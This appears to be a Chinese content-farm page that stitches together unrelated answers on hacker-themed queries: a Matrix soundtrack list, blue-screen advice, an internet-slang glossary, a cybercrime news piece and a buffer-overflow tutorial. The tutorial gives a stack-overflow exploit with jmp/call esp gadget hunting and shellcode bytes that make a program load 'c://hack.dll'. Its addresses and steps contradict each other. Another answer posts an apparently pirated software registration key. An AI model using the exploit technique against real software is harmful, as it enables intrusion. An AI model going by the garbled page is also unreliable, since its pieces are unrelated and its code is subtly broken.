bad在黑客(bad from)
本文目录一览:
- 1、黑客帝国中的主题曲和插曲是什么?
- 2、我的电脑先是黑屏然后又蓝屏出现以下英文,是被黑客入侵了吗?
- 3、网络上有哪些网络新词语?
- 4、如何利用缓冲区溢出的程序错误来运行黑客程序
- 5、卡巴发现了:BAD-STATUS(5)、BAD-STATUS(-1)
- 6、黑客里面黑产是什么意思?
黑客帝国中的主题曲和插曲是什么?
比较经典的有:SPYBREAK、ROCK
IS
DEAD
……
。这是所有的黑客帝国曲子包括插曲楼主01.
Rock
Is
Dead
-
Marilyn
Manson
02.
Spybreak
-
Propellerheads
03.
Bad
Blood
-
Ministry
04.
Clubbed
to
Death
[Kurayamino
Mix]
-
Rob
D.
05.
Prime
Audio
Soup
-
Meat
Beat
Manifesto
06.
Leave
You
Far
Behind
-
Lunatic
Calm
07.
Mindfields
-
The
Prodigy
08.
Dragula
[Hot
Rod
Herman
Remix]
-
Rob
Zombie
09.
My
Own
Summer
(Shove
It)
-
Deftones
10.
Ultrasonic
Sound
-
Hive
11.
Look
to
Your
Orb
for
the
Warning
-
Monster
Magnet
12.
Hast
-
Rammstein
13.
Wake
Up
-
Rage
Against
the
Machine
我的电脑先是黑屏然后又蓝屏出现以下英文,是被黑客入侵了吗?
不用当心,这是程序运行过程中出错造成的,出错产生后WINDOWS会被自动关闭产生上面提示的蓝屏。如果你是在下载或者安装某程序时出现的这种情况。只要重启一下电脑,如果是在下载或者安装程序时出现的,请把它删掉。另外,在窗口中运行了过多的程序,造成程序间冲突,或者CPU压力过大、处理过慢也会出现上面的蓝屏提示。清理一下垃圾就可以了!不要一次性运行过多的程序!
这跟黑客入侵没有关系。
网络上有哪些网络新词语?
我不叫我,叫----偶
年轻人不叫年轻人,叫----小P孩
岁数不叫岁数叫----年轮
蟑螂不叫蟑螂,叫----小强
什么不叫什么,叫----虾米或神马
不要不叫不要,叫----表
喜欢不叫喜欢,叫----稀饭
这样子不叫这样子,叫----酱紫
那样子不叫那样子,叫----酿紫
好不叫好,叫----强
强不叫强,叫----弓虽
看不懂不叫看不懂,叫-------晕。
不满不叫不满,叫-----------靠。
见面不叫见面,叫-----------聚会。
大哥不叫大哥,叫-----------兄台。
看法不叫看法,叫-----------愚见。
有钱佬不叫有钱佬,叫-----vip。
提意见不叫提意见,叫-----拍砖。
支持不叫支持,叫------------顶。
强烈支持不叫强烈支持,叫------------狂顶。
不忠不叫不忠,叫------------外遇。
纸牌游戏不叫纸牌游戏,叫----杀人
追女孩不叫追女孩,叫----把MM
看MM不叫看MM,叫----鉴定
好看不叫好看,叫----养眼
厉害不叫厉害,叫——牛x!
不懂装懂叫----sb!
乐一乐不叫乐一乐,叫happy!
尴尬不叫尴尬,叫——汗或囧
不喜欢不叫不喜欢,叫--吐
思想异类叫------变态bt
我爱你不叫我爱你,叫——你去死
你进来不叫你进来,叫---乱入
兴奋不叫兴奋,叫----high
吃喝不叫吃喝,叫----腐败
请人吃饭不叫请客,叫----反腐败
文字擦边游戏,叫 rpwt 测试
帖子老不叫老,叫火星
欠扁不叫欠扁-----叫陈水
还有一些有趣的网络用语:
如88用来指拜拜,1314有网络中用来指一生一世,而且8常用来代替不,比如8要即为不要,8给即为不给
类似的如酱紫即为这样子
还有一些比较常用来称呼的网络用语,如:GG(哥哥) JJ(姐姐) DD(弟弟) MM(美眉) 大虾 菜鸟 青蛙 恐龙 网虫 黑客 闪客 斑猪等
还有一些有趣的动词:如说人隐身为潜水,人们都习惯了说“我晕”等
PK就是单挑
粉丝 就是FANS 追星族
追女孩不叫追女孩,叫--泡妞
吃不叫吃,叫--撮
羡慕不叫羡慕,叫--流口水
乐一乐不叫乐一乐,叫--happy
跳舞不叫跳舞,叫--蹦的
东西不叫东西,叫--东东
别人请吃饭不叫请吃饭,叫--饭局
特兴奋不叫特兴奋,叫--至high
有本事不叫有本事,叫--有料
倒霉不叫倒霉,叫--衰
单身女人不叫单身女人,叫--小资
单身男人不叫单身男人,叫--钻石王老五
被无数蚊子咬了不叫被无数蚊子咬了,叫--新蚊连啵
看帖不叫看帖——叫瞧瞧去
不错不叫不错,叫8错
去死不叫去死,叫74
亲亲你叫771,抱抱你叫881
气死我了——7456
祝你快乐不叫祝你快乐.........叫猪你快乐
就是不叫就是,叫94
是啊不叫是啊,叫42
不要不叫不要——叫表
kick your ass:踢你的PP
FT,分特:faint的简称,晕倒。
统一:刷墙,扫楼的同义词。也就是整个版面都是你的回复,一种被谴责的行为。
XXXX的说:一种动词后置,比如吃饭的说
XXXXing:XXXX进行中,正在XXXX。比如上网ing
PP:照片,但如果是说打PP,那就是kick your ass的意思了
kick your ass:打你屁屁
SL:色狼。浮云的特点是,狼多也MM多
GF:girl friend,女友
BF:boy friend,男友
JJWW:唧唧歪歪,指人说话的样子
SJB:神经病 (世界杯)
PMP:拍马屁
MPJ:马屁精
kick:扁
slap:打耳光
KH:葵花,就是练葵花宝典的高手,浮云某高手已练至化境,人皆不呼其名,而直呼KH。
KHBD:葵花宝典
PXJF:辟邪剑法,源于KHBD,KH专用的剑法
SP:support,支持
的微:一种语气助词,KH专用
呼呼,猪猪:睡觉
果酱:过奖
BXCM:冰雪聪明
LOL:Laugh Out Loud,大笑
KFC:Kxxx Fxxx Cxx,要是和某人有仇,就KFC他吧
PK:player kill,砍人,攻击,也可解释为先批后K
btw:by the way,顺便说一句
PS:两种意思,btw或者photoshop(一种电脑修图软件)
CU:see you,再见
BB:宝贝,情人,孩子,byebye,看具体使用
走召弓虽:超强
饭饭:吃饭
片片:照片
斑竹,板猪:版主,论坛版块的管理人员,把水版比作个小店,他们就是店小二。
水桶,水鬼,水仙,水王,水母:指灌水狂人,水母特制女性
水手:版中的芸芸众生
潜水员:就是那些喜欢看别人灌水自己不灌水的家伙
抓狂:受不了刺激而行为失常
THX,3X:thanks,谢谢
sigh:叹息
cool:酷
pm:论坛的私信
zip it:闭嘴
DL:download,下载
PUB:网路上扫描到的ftp,可以临时起上传下载功能,也指把文件传到pubftp上共享的行为。
BRB:Be right back,马上回来
TTYL:Talk to you later,再见,下次回头再谈
BBL:be back later 过会回来
包子:某人长得难看或者笨就说他包子
粉:很,非常
蛋白质:BD+BC+SJB
爱老虎油:I love you,我爱你
表:不要,比如表太好,不要太好的意思。
咣当:晕倒发出的声音
猪娃:CCF传过来的口语,好孩子
爆头:游戏中引来的词汇,把某人打得脑袋开花
748:去死吧
886,88:再见
847:别生气
987:就不去,就不去
55555:哭
XXX:儿童不宜的东西
blah-blah:反复说
厚厚,吼吼,咔咔,kaka,嘻嘻,xixi:语气助词
+U 加油。
BC 白痴
BOT 机器人。
BTW Bye The Way,顺便提一下。
BT 变态。例句:挂着鼻涕上网也很BT的哦。或BitTorrent一种新型的P2P下载工具。
CC ①xixi,嘻嘻,西西。嘿嘿.②醋醋,吃醋。
CT 警察。
DBC 大白痴
DD 弟弟。
di 结构助词“的”,专门用于句子最末,表示强调。例句:不是这样di!
e 恶心。
eg 举例。
FOAF Friend of a Friend,一个朋友的朋友。
GF Girl Friend,女朋友。
Friend of a Friend 一个朋友的朋友。
GB 任天堂出的著名掌上游戏机(GameBoy),还有:GBA(GameBoyAdvance)。
GG 哥哥。
gx 恭喜。
Haha 哈哈。笑声
BOSS 大怪,游戏大怪
Hehe 呵呵。笑声
hiahia 象声词,怪笑。
HIGH 高了,常用于喝酒等行为下。
hoho 爽朗的笑声。
HP 生命值。
IC I See,我明白。例:oic(哦,我明白了)。还有:CU,"See You",含有再见(SeeYouLater)之意。
JJBB 结结巴巴。类似的还有:JJYY,JiJiWaWa,"唧唧歪歪“,”唧唧哇哇“。
JR 贱人
JS 奸商。
K 象声词,咳嗽声。例句:KKK……无聊。
L 快乐。例句:我今天很L,你呢?
LBT 路边摊。
lj 垃圾。
LM 辣妹
lr 烂人。
L公(或LG) 老公。
L婆(或LP) 指老婆。
M 笨蛋、木头。例句:你真M。
md ****。
me2 me too,我也是。
mop 猫扑,游手好闲的缩写词。来自猫扑网站,猫扑上的成员叫"Mopper"。英文原意为"拖把".
MP 没品。
msg Message,消息,信息。
N 表示思考。例句:N......N......
NB ① 牛逼。还有:NBHH,牛逼烘烘,牛人,大牛.② 自然美,Natural Beautiful。
nod 点头(动作)。
nr 脑弱。
O ①回答别人的傻话。例句:O......O......想吐! ②有时也用来表示:“我”,"ou"。③喔。
P 否定用语。例句:你放P!
papa 怕怕。例:papaya(怕怕呀)
PC Personal Computer(个人电脑)的缩写。
PF 佩服。
PK Person-killing,单挑,要出虚拟人命的网上决斗。
PLMM 漂亮美眉。
PMP 拍马屁。也有:PMPMP(拼命拍马屁).
PM ①Private Message,私人消息,就是论坛上的悄悄话。②Pardon Me,请原谅我。
PPMM ①婆婆妈妈。②漂漂美眉。
pp ① 点点通软件。② 屁股。
PS ①PhotoShop(一个著名图形处理工具)的缩写。
②PlayStation(SONY出的一个著名游戏机种)的缩写。
③Post窖裕?奖省@?纾骸癙.S:这只是我的个人观点……”
puke 呕吐。
PvP 由PK改名而来,因为目前韩国政府已下令游戏开发商,必须将"PK"改为"PvP"(Player Versus Player)。
pw password,密码。
py 朋友。
Q ① 求人。例句:我QQ你了,把你的电话号码给我吧。
② 可爱。为英文“CUTE”的音译;
③ 用icq聊天工具呼叫。例句:前天,我曾Q过你。
qr 穷人。
qu4 去死。
Q男,Q女 用icq或oicq聊天的男人或女人。
R 语气词,惊奇。例句:R?你是小学生。
re 回文。
rpwt 人品问题。
rq 人气。
rt 如题。用于发新帖时,当内容已经在标题上打出时,内容栏里就仅注明rt。
ry 人妖。
S 死机。例句:对不起,我刚才S了。
SB **,对某些人的蔑称,骂人用语。
sg 帅哥。可以用:ssgg表示”好帅的哥哥哦!”
sigh 叹气。
SL 色狼。
sm ①Sado-Masochi,性虐恋。S 为Sadism性虐待,M 为 Masochism被虐待.② 什么。例句:你刚才说sm?
sp support,支持。
SS SEGA出的SATURN游戏机。
ST 失态。
T 踢。例:T飞(踢飞)。
Thx Thanks.
tears 流泪。
*** 他****。
too 表示程度。例:tooooooo…… bad (太……糟糕了)
ts 同上。就是同意楼上的意见,用在回贴时。
U You,你。例如:Thank U! “谢谢你!”。还有Ur,表示:your,你的。I服了U,表示:我服了你了。
UK United Killers,杀手联盟。
vs 对决。与pk不同的是,vs并不一定代表单独挑战。
W 王或者万。例:新人W。破W。
wl 网恋。
ww 弯弯,指台湾同胞。
X 错。例句:你大X特X。
XPP 夏骗骗[2],指学术造假者夏纪梅,也指一切学术造假者,例句:又多了一个夏骗骗。
Y WHY,为什么?
YK 幼齿,年幼,未成年。
yy 意淫,过度欲望。不一定指下流的想入非非的,往往是为了达到思想、心理及口头上的快感。
zzZZz 睡觉的状态。
…哈 语气词,例句:今天又有人病了哈。
一枪爆头 一枪就把对方脑袋打掉。
不睬你 不理你。(新加坡语)
么么黑 非常黑暗。
亮骚 将心爱的东西给别人看。
伟哥 伟大的男人。
系咪 是不是。
做脸 整容。
兔爸 toolbar,工具条。
切 语气词(qie~),表示蔑视。
刷屏 指用重复的句子把聊天或论坛的一页刷一遍,以清洁版面。
压 语气词“呀”。
可爱 可怜而没人爱。
台客/台妹 土气粗俗的意思。(台语)。原指早期原台/湾人民。
吐血 形容郁闷心情。
吼吼 恐龙专用,情绪不明。
呕像 呕吐的对象。
和和 呵呵。
啊哦 唐老鸭常用语气词。
喷鼻血 形容被震惊的样子。
坛子 论坛。
型男 模特身材的男人,也有“型女”的说法。
大丈夫 没问题。(日语)
大刀 打倒。
好康 好看。
如花似玉 丑陋。
姑狗 Google搜索引擎。也写作“辜狗”。
寒 惊叹,害怕。有时也写作“汗”。例句:楼上的观点非常可怕。寒~!
干色摸 干什么。也写作“干虾米”。
开画 公开放映。
弓虽 语气词“强”,厉害,了不起,
恐龙 kl,长相困难的女生。
惨绿 不幸。
我倒 用于表示佩服,或出其意料之外。
我闪 用于表示惹不起躲得起。
战队 指一组成员编组参加电脑游戏比赛。
打口 碟片被打了个口子的海关行为。
抛砖 跟帖。
抢一 指杂论坛里抢第一个回复位置。
抢整 qz,抢发第整数帖文章。
拍砖 指回贴时持批评态度。
捏 语气词,发音为“nie”,表示的语气接近于“呢”。
搞大 把事情弄得夸张的意思。
斑竹 版主。有时也会写成”板猪“。
暖被儿奖 指诺贝尔奖。
暴笑 巨大笑声。
有形 有派头。
板斧 版副。
楼上 楼上就是上面的帖子回复者。另外还有“楼下”、“顶楼”、“底楼”、“楼主(发帖者)”等一系列说法。
残念 ①可惜;②死亡。(日语)
母代(或无得) 没得,没有。(南京发音)。
水蒸气 比纯净水还纯的水,就是无文字及任何内容的空白帖子。
油墨 幽默。
泡菜 指在论坛里浏览。
泥巴 mud游戏。
温酒吧 Win98.类似的还有:瘟都死(windows).
漫迷 漫画fan。
潜水 指呆在聊天室里不说话。
灌水 指在网络上发布一些意义不大的文字。
灰常灰常 非常非常。
烘培鸡 HomePage,个人主页,“竹叶”。
狗狗 狗的昵称。
狼族 与色狼不同,作风正派,喜欢独断独行,虽爱女色,但从不死缠mm。
猫 Modem,调制解调器(拨号上网用的东西),
王求革圭 指球鞋。
甩枪 凭感觉将准星甩出去瞄准射击。
甫士 Pose,姿势。
盲狙 不开瞄准镜,直接打狙击枪的。
笨拉灯 本·拉登。
粉 很。
素 是。
素颜 没有化装的面孔。
纯净水 无内容的帖子。
练狙 练习狙击枪技法。
置顶 将某个帖子放在列表的最上方。
老大 带头的。有时是被众人吹捧的人,有时是被众人暴打的人。
老斑 班主任。
肉鸡 弱机,是指网络上安全性不强,被人完全控制的机器。
菜鸟 新手。
衰 倒霉。
轻舞肥羊 源自痞子蔡的轻舞飞扬,用来嘲笑MM。
达人 高人。
酿紫 那样子。
闪客 制作flash的人。
隔壁 旁边论坛或聊天室。
青蛙 qw,长相可怕的男生。
靓号 指号码不错的QQ号。
领导 老婆。
飞仔/飞女 太保/太妹。小流氓。
马桶文章 烂文章。
马甲 指一个人拥有的多个ID。
驴友 旅游者。
咸 色/情。
黑名单 BBS中被关的ID。
坑 会引起很多人回复的帖子。
唔 不。
唔系 不是。广东话
1、“0”开头
01925:你依旧爱我。
02746:你恶心死了。
02825:你爱不爱我。
03456:你相思无用。
0437:你是神经。
045617:你是我的氧气。
04527:你是我爱妻。
04535:你是否想我。
04551:你是我唯一。
0456:你是我的。
04567:你是我老妻。
0457:你是我妻。
045692:你是我的最爱。
0487:你是白痴。
0487561:你是白痴无药医。
0564335:你无聊时想想我。
0594184:你我就是一辈子。
065:原谅我。
06537:你惹我生气。
07382:你欺善怕恶。
0748:你去死吧。
07868:你吃饱了吗?
08056:你不理我了。
0837:你别生气。
095:你找我。
098:你走吧。
2、“1”开头
14580 要死我帮您 12580 一按我帮您 1314:一生一世。
1314920:一生一世就爱你。
1372:一厢情愿。
1392010:一生就爱你一个。
1414:要死要死;意思意思。
147:一世情。
1573:一往情深。
1589854:要我发,就发五次。
1711:一心一意。
177155:MISS。(这个不是谐音,是象形)
1920:依旧爱你。
1930:依旧想你。
3、“2”开头
200:爱你哦。
20110:爱你一百一十年。
20184:爱你一辈子。
2030999:爱你想你久久久。
2037:为你伤心。
20475:爱你是幸福。
20609:爱你到永久。
20863:爱你到来生。
220225:爱爱你爱爱我。
230:爱死你。
234:爱相随。
235:要想你。
2406:爱死你啦。
246:饿死了。
246437:爱是如此神奇。
25184:爱我一辈子。
25873:爱我到今生。
25910:爱我久一点。
25965:爱我就留我。
259695:爱我就了解我。
259758:爱我就娶我吧。
2627:爱来爱去。
282:饿不饿。
256895:你是可爱的小狗。
4、“3”开头
300:想你哦。
30920:想你就爱你。
3013:想你一生。
310:先依你。
31707:LOVE。(这个单词需要把30707倒过来看)
32062:想念你的爱。
032069:想爱你很久。
3207778:想和你去吹吹风。
330335:想想你想想我。
3344587:生生世世不变心。
3399:长长久久。
356:上网啦。
35910:想我久一点。
359258:想我就爱我吧。
360:想念你。
369958:神啊救救我吧。
3731:真心真意。
39:Thank you。
30920:想你就爱你。
5、“4”开头
440295:谢谢你爱过我。
447735:时时刻刻想我。
4456:速速回来。
456:是我啦。
460:想念你。
4980:只有为你。
48:是吧。
6、“5”开头
505:SOS。
507680:我一定要追你。
510:我依你。
51020:我依然爱你。
51095:我要你嫁我。
51396:我要睡觉了。
514:无意思。
515206:我已不爱你了。
518420:我一辈子爱你。
520:我爱你。
5201314:我爱你一生一世。
52094:我爱你到死。
521:我愿意。
52306:我爱上你了。
5240:我爱是你。
52460:我爱死你了。
5260:我暗恋你。
530:我想你。
5366:我想聊聊。
5376:我生气了。
53719:我深情依旧。
53770:我想亲亲你。
53782:我心情不好。
53880:我想抱抱你。
53980:我想揍扁你。
540086:我是你女朋友。
5406:我是你的。
5420:我只爱你。
54335:无事想想我。
543720:我是真心爱你。
54430:我时时想你。
5452830:无时无刻不想你。
546:我输了。
5460:我思念你。
5490:我去找你。
54920:我始终爱你。
555......:呜呜呜(哭)。
55646:我无聊死了。
5620:我很爱你。
5360:我想念你。
5630:我很想你。
564335:无聊时想想我。
570:我气你。
57350:我只在乎你。
57386:我去上班了。
57410:我心属于你。
574839:我其实不想走。
5776:我出去了。
58:晚安。
584520:我发誓我爱你。
586:我不来。
587:我抱歉。
5871:我不介意。
59240:我最爱是你。
59420:我就是爱你。
59520:我永远爱你。
596:我走了。
517230:我已经爱上你。
5170:我要娶你。
5209484:我爱你就是白痴。
7、“6”开头
609:到永久。
6120:懒得理你。
6785753:老地方不见不散。
6868:溜吧溜吧。
687:对不起。
6699:顺顺利利
8、“7”开头
70345:请你相信我。
706:起来吧。
70626:请你留下来。
7087:请你别走。
70885:请你帮帮我。
721:亲爱你。
729:去喝酒。
7319:天长地久。
737420:今生今世爱你。
73807:情深怕缘浅。
740:气死你。
7408695:其实你不了解我。
74520:其实我爱你。
74074:去死你去死。
74839:其实不想走。
756:亲我啦。
765:去跳舞。
770880:亲亲你抱抱你。
7731:心心相印。
7752:亲亲吾爱。
77543:猜猜我是谁。
77895:紧紧抱着我。
786:吃饱了。
7998:去走走吧。
7086:七零八落。
70345:请你相信我。
780:牵挂你。
706519184:请你让我依靠一辈子。
7758258:亲亲我吧爱我吧。
9、“8”开头
8006:不理你了。
8013:伴你一生。
8074:把你气死。
8084:BABY。
81176:不要在一起了。
82475:被爱是幸福。
825:别爱我。
837:别生气。
8384:不三不四。
85941:帮我告诉他。
860:不留你。
865:别惹我。
8716:八格耶鲁。
88:Bye Bye。
886: 拜拜拉。
8834760:漫漫相思只为你。
898:分手吧。
10、“9”开头
902535:求你爱我想我。
9089:求你别走。
910:就依你。
918:加油吧。
920:就爱你。
9213:钟爱一生。
9240:最爱是你。
930:好想你。
93110:好想见见你。
940194:告诉你一件事。
9494:就是就是。
95:救我。
987:对不起。
9908875:求求你别抛弃我。
如何利用缓冲区溢出的程序错误来运行黑客程序
上回说了,我们可以在一个有缓冲区溢出漏洞的程序中执行程序中其他的函数,当然,也可以执行程序中其他的指令。还是以上次讲过的程序为例:
程序A:
#include stdio.h
#include string.h
void foo(const char *input)
{
char buf[10];
strcpy(buf, input);
}
int main(int argc, char *argv[])
{
foo("1234567890123456123456123456");
return 0;
}
启动VS 2005,然后将断点设在函数foo中strcpy的后面,断点执行到了以后,进入反汇编窗口,单步执行到该函数最后一行汇编指令,也就是ret指令,在内存窗口中查看寄存器esp保存的内存地址所存放的值,当然你的内存窗口的显示方式应该是4字节显示方式(x86或者说是32位机器上)。你可以看到该值也已经被foo的参数12345678那些字符串覆盖了,然后你可以看看esp的值和ebp的值刚好相差8个字节。就是说,内存中的形式是这样的:
ebp的值 esp的值
^ ^
| |
--------------------------------------
| |函数返回地址| |
---------------------------------------
而你再看看foo函数最后几个汇编指令:非常标准的函数退出时,所作的栈销毁操作:
mov esp ebp
pop ebp
ret
在ret指令执行完成以后,esp的值就会是foo函数的ebp + 8。
如果我们在esp所指向的内存地址上存放我们的shell code(或者说是我们刻意编写的汇编代码),然后将函数返回地址更改为调用我们的shell code的地址,那么我们所编写的shell code也就会被执行,这时就可以干任何我们想干的事情了,;)。
下面是步骤:
1,编写一个dll,其实exe程序也可以,只不过方法略有不同,如果你是直接执行exe程序的话,可以使用WinExec。这里因为我要导入我编写的dll进入程序A,所以使用的WINAPI函数是LoadLibrary,LoadLibrary需要一个参数,指明要加载的dll的文件路径。
2. 在我编写的dll中,处理的事情很简单,就是启动一个程序,呵呵,下面是源代码:
#include
"stdafx.h"
#include stdio.h
#include windows.h
#ifdef _MANAGED
#pragma managed(push, off)
#endif
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( si,
sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( pi, sizeof(pi) );
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // 每次一个新的进程加载该dll的时候,触发这个条件
WinExec("C://WINDOWS//notepad.exe", SW_SHOW);
break;
default:
break;
}
return TRUE;
}
#ifdef
_MANAGED
#pragma managed(pop)
#endif
3.为了调用LoadLibrary,我们需要写一些汇编指令,因为cpu执行的是机器码,而不是汇编指令,所以你要将汇编指令转换为机器码。转换很简单,在你的代码里面加上下面这几行:
int main()
{
_asm {
jmp esp
}
}
将断点设置在main函数的开始处,执行程序,程序中断后,去反汇编,你会看到类似下面的代码:
00401763 FF E4 jmp esp
00401763是这段汇编码在程序中的地址,FF E4就是jmp esp对应的机器码了。呵呵,如果没有FF E4出现的话,在反汇编窗口中右键单击,选择“Show Byte Code”(VS 2005英文版)。
现在腰调用esp中的地址,可以是jmp esp也可以是call esp,但是这个代码必须是进程中已有的,OK,我们在程序中找到这个地址。再次运行程序A,在main函数中设置断点,中断后,选择Debug -- Window -- Module查看这个程序所有加载的dll(无论是动态的还是静态加载的)。程序A中不出意外的话应该有kernel32.dll和ntdll.dll,还有可能有msvcrt8.dll。
我们找一下这些dll里面有没有对应的机器码,怎么找?怎么把一个dll反汇编?呵呵,VS 2005里面自己就带了一个反汇编工具:dumpbin,路经在C:/Program Files/Microsoft Visual Studio 8/VC/bin。dumpbin有一个选项/disasm就是将任何一个PE文件(DLL或EXE)反汇编
打开cmd窗口,执行dumpbin /disasm c:/windows/system32/kernel32.dll | findstr /c:"FF E4",哦哦,没有。再试ntdll.dll,还是没有。试一下call esp,它的机器吗是FF E5。kernel32.dll里面没有,啊哈,ntdll.dll里面有,这是搜索结果:
7C914393: FF E5 call esp
4.编写shell code,调用LoadLibrary,需要知道LoadLibrary函数的地址,获取的办法是这样的:LoadLibrary是在kernel32.dll中的,启动Depends.exe,Depends.exe包含在Windows SDK中,你也可以去网上搜一下,下载一个回来用,实在找不到,那我就牺牲一下自己啦。
随便用depends打开一个exe文件,在左上角的依赖树里面点击kernel32.dll,在右边第二个窗口中找到LoadLibraryA这个函数,可以看到它的Entry Point是0x000445EF,如下:
E | Ordinal | Hint | Function | Entry Point
---------------------------------------------------------------------------------------------
754 (0x02F2) | 753 (0x02F1) | LoadLibraryA | 0x000445EF
操作系统不一样,值可能不一样,在最下面的窗口中找到kernel32.dll的base address(Preferred Base)是0x77E00000,如下:
Module | ... 中间很多省略 ... | Preferred Base
-------------------------------------------------------------------------
Kernel32.dll | .... | 0x77E000000
将Kernel32.dll的Preferred Base和LoadLibraryA的Entry Point按位于就获得LoadLibraryA在你的程序中的地址是:0x77E445EF。
5。最后编写汇编代码执行你的黑客程序:
_asm {
mov eax 0x77E445EF // 将LoadLibraryA的地址存在eax寄存器中
call L4
L2: call eax // 调用LoadLibraryA,程序执行到这段指令时LoadLibraryA的参数已经压栈
L3: jmp L3 // 循环,确保被黑的程序不会死掉
L4: call L2
}
6。最后,示例程序如下:
#include
stdio.h
#include string.h
void func(char *p)
{
char stack_temp[20];
strcpy(stack_temp, p);
printf(stack_temp);
}
void foo()
{
printf("This should not be called");
}
int main(int argc, char *argv[])
{
func("I AM MORE THAN TWENTLONG/x93/x43/x91/x7C"
"/xB8/x77/x1D/x80/x7C" // mov eax 0x771D807C LoadLibraryA的地址
"/xEB/x04" // call L4
"/xFF/xD0" // L2: call eax
"/xEB/xFE" // L3: jmp L3
"/xE8/xF7/xFF/xFF/xFF" // L4: call L2
"c://hack.dll/0"); // LoadLibraryA的参数,也就是我们要刻意加载的dll文件
return 0;
}
完了,累死了
卡巴发现了:BAD-STATUS(5)、BAD-STATUS(-1)
BAD-STATUS(5木马病毒,木马清道夫应该可以解决你的问题.
木马清道夫注册码:89K4-97982-7987-12U5 (不知道还不可以用 呵呵,先试试吧)
华军软件园下载地址:
Windows木马清道夫是一款专门查杀并可辅助查杀木马的专业级反木马信息安全产品,是全新一代的木马克星!《Windows木马清道夫》可自动查杀近10万种木马,配合手动分析可近100%对未知木马进行查杀!它不仅可以查木马,还可以分析出后门程序,黑客程序等等。它专业的分析功能,完美的升级功能,使你不再惧怕木马,让你远离木马的困扰!
BAD-STATUS(-1找出染毒文件......................然后
打开windows任务管理器,察看是否有可疑的进程在运行,如果有把它结束。(Rundll32.exe本身不是病毒,有可能一个dll文件在运行,他可能是病毒或恶意程序之类的东西。)
若提示无法结束,再察看控制面板〉管理工具〉服务,看有没有与之相关的 服务在运行,把它停止。同时设法查找这些恶意程序文件(如system32文件夹中是否有不明dll或exe文件,C:\Program Files C:\Documents and Settings\user\Local Settings\Temporary Internet Files C:\Documents and Settings\user\Local Settings\Temp 等处是否有不明文件或染毒文件),然后删去,注意别删了系统文件!
黑客里面黑产是什么意思?
在浙江义乌,一个小商家的老板刚刚上班,查看前一天的监控视频发现,凌晨有人翻墙入室,但奇怪的是,店内并没有什么物品失窃。再仔细查看一遍视频,才发现这名偷偷潜入的神秘人操作了店内的电脑就走了。
对于这种情况,商家也很疑惑,不知是否算是入室盗窃案,因此也就没有报警。但没过多长时间,这位小商家的交易记录和订单数据就出现在了“网络黑市”里。
原来,神秘人在这位小商家的电脑上插入了一个经过改造的U盘“Bad USB”,里面装有可以封闭执行的木马病毒,将其拷贝到电脑后,神秘人可以远程控制这台电脑,从而获取商家的交易记录和大量的用户真实信息,甚至影响资金安全。而且,神秘人也可以将商家数据和个人信息转手售卖给网络诈骗组织,造成更多威胁。
此乃网络黑灰产犯罪案的典型。所谓网络黑灰产,指的是电信诈骗、钓鱼网站、木马病毒、黑客勒索等利用网络开展违法犯罪活动的行为。稍有不同的是,“黑产”指的是直接触犯国家法律的网络犯罪,“灰产”则是游走在法律边缘,往往为“黑产”提供辅助的争议行为。
上述案例的背后,也隐现着当前网络黑灰产治理中的难点和痛点:行为隐秘,用户、商家很难注意到;分工明确,已经形成产业链;涉及多方,但往往难以明确各方责任;安全威胁深远,但现行法律难以消除……
网络黑灰产已近千亿规模
网络黑灰产有多大的威胁?这个问题恐怕没有绝对准确的答案。
据南都大数据研究院等机构发布的《2018网络黑灰产治理研究报告》估算,2017年我国网络安全产业规模为450多亿元,而黑灰产已达近千亿元规模;全年因垃圾短信、诈骗信息、个人信息泄露等造成的经济损失估算达915亿元,而且电信诈骗案每年以20%~30%的速度在增长。
该报告还指出,黑灰产共有四种类型:虚假账号注册等源头性黑灰产;用于进行非法交易、交流的平台;木马植入、钓鱼网站、各类恶意软件等;大多以恶意注册、虚假认证、盗号等形式实现的网络黑账号。
另据阿里安全归零实验室统计,2017年4月至12月共监测到电信诈骗数十万起,案发资金损失过亿元,涉及受害人员数万人,电信诈骗案件居高不下,规模化不断升级。2018年,活跃的专业技术黑灰产平台多达数百个。
虽然数额惊人,但许多人并不知道自己是如何被黑灰产盯上的。据阿里安全归零实验室高级专家功夫介绍,网络黑产人员经常利用绰号“大菠萝”的一种路由器伪装成免费WIFI,只要用户连接就可以窃取个人信。